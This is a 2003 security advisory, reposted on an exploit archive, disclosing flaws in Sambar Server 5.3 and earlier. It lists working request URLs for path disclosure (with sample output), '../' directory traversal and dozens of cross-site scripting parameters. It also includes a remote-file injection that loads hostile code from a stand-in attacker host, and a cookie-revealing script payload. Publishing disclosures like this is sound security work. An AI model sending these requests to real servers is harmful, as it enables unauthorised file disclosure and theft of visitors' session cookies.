what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SCSA012.txt

SCSA012.txt
Posted Mar 29, 2003
Authored by Gregory Le Bras | Site Security-Corp.org

Security Corporation Security Advisory [SCSA-012]: The Sambar server default installation has a cgi-bin directory which contains executables that allow remote users to view information regarding the operating system and web server's directory. It also path disclosure and tons of cross site scripting vulnerabilities.

tags | exploit, remote, web, cgi, vulnerability, xss
SHA-256 | b897ec3ddb97840373628aa3bb5efc9f8c599d518df5000da8a5091885486a75

SCSA012.txt

Change Mirror Download
________________________________________________________________________

Security Corporation Security Advisory [SCSA-012]
________________________________________________________________________

PROGRAM: Sambar Server
HOMEPAGE: https://www.sambar.com/
VULNERABLE VERSIONS: 5.3 and prior
________________________________________________________________________


DESCRIPTION
________________________________________________________________________

"Sambar Server is the new standard in high performance multi-functional
servers with features rivaling other commercial products selling
separately for several hundreds of dollars. It's Winsock2 compliant Win32
integration functions on Windows 95, Windows 98, Windows NT, Win2000,
and XP as a service or as an application."
(direct quote from https://sambar.jalyn.net)


DETAILS & EXPLOITS
________________________________________________________________________


¤ Path Disclosure :

Sambar default's installation of the CGI bin directory contains
a testcgi.exe and a environ.pl that allows remote users to view
information regarding the operating system and
web server's directory.

These vulnerabilities can be triggered by a remote user submitting
a specially crafted HTTP request.


- Exploits :

https://[target]/cgi-bin/environ.pl

https://[target]/cgi-bin/testcgi.exe


Will produce the following output:

- environ.pl :
--------------

Sambar Server CGI Environment Variables
GATEWAY_INTERFACE: CGI/1.1
PATH_INFO:
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl
QUERY_STRING:
REMOTE_ADDR: 127.0.0.1
REMOTE_HOST:
REMOTE_USER:
REQUEST_METHOD: GET
DOCUMENT_NAME: environ.pl
DOCUMENT_URI: /cgi-bin/environ.pl
SCRIPT_NAME: /cgi-bin/environ.pl
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl
SERVER_NAME: localhost
SERVER_PORT: 80
SERVER_PROTOCOL: HTTP/1.1
SERVER_SOFTWARE: SAMBAR
CONTENT_LENGTH: 0
CONTENT:


- testcgi.exe :
---------------

Test CGI ... Version 1.00 [ build date 8-03-97 ]

QUERY_STRING
PATH_INFO
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe
SCRIPT_NAME /cgi-bin/testcgi.exe
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe
DOCUMENT_ROOT C:/sambar53/docs/
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
REMOTE_ADDR 127.0.0.1
REMOTE_HOST
SERVER_NAME localhost
SERVER_PROTOCOL HTTP/1.1
SERVER_SOFTWARE SAMBAR
CONTENT_TYPE

----------------------------


¤ Directory Disclosure :

Other security vulnerabilities was found in Sambar which allow an
attacker to reveal the content of the files and the directories
on the web server, even if it should not be revealed.

These vulnerabilities can be simply exploited by requesting a
specially crafted URL utilizing iecreate.stm and ieedit.stm
application with a '../' appended.

- Exploits :

https://[target]/sysuser/docmgr/iecreate.stm?template=../

https://[target]/sysuser/docmgr/ieedit.stm?url=../


----------------------------


¤ Cross Site Scripting :

Many exploitable bugs was found on Sambar Server which cause script
execution on client's computer by following a crafted url.

This kind of attack known as "Cross-Site Scripting Vulnerability" is
present in many section of the web site, an attacker can input
specially crafted links and/or other malicious scripts.

- Exploits :

https://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]

https://[target]/netutils/whodata.stm?sitename=[hostile_code]

https://[target]/netutils/findata.stm?user=[hostile_code]

https://[target]/netutils/findata.stm?host=[hostile_code]

https://[target]/isapi/testisa.dll?check1=[hostile_code]

https://[target]/cgi-bin/environ.pl?param1=[hostile_code]

https://[target]/samples/search.dll?query=[hostile_code]&logic=AND

https://[target]/wwwping/index.stm?wwwsite=[hostile_code]

https://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456

https://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]

https://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]

https://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]

https://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]

https://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/create.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/info.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/info.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/search.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/search.stm?query=[hostile_code]

https://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/template.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/update.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/update.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]

https://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]

https://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]

https://[target]/cgi-bin/testcgi.exe?[hostile_code]


- An other Cross Site Scripting can be exploited with a
remote file where's include the hostile code like this :

https://[target]/sysuser/docmgr/ieedit.stm?url=https://[attacker]/hostile_file
.htm


The hostile code could be :

[script]alert("Cookie="+document.cookie)[/script]

(open a window with the cookie of the visitor.)

(replace [] by <>)


SOLUTIONS
________________________________________________________________________

No solution for the moment.


VENDOR STATUS
________________________________________________________________________

The vendor has reportedly been notified.


LINKS
________________________________________________________________________

- https://www.security-corp.org/index.php?ink=4-15-1

- Version Française :
https://www.security-corporation.com/index.php?id=advisories&a=012-FR


------------------------------------------------------------------------
Grégory Le Bras aka GaLiaRePt | https://www.Security-Corporation.com
------------------------------------------------------------------------





Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close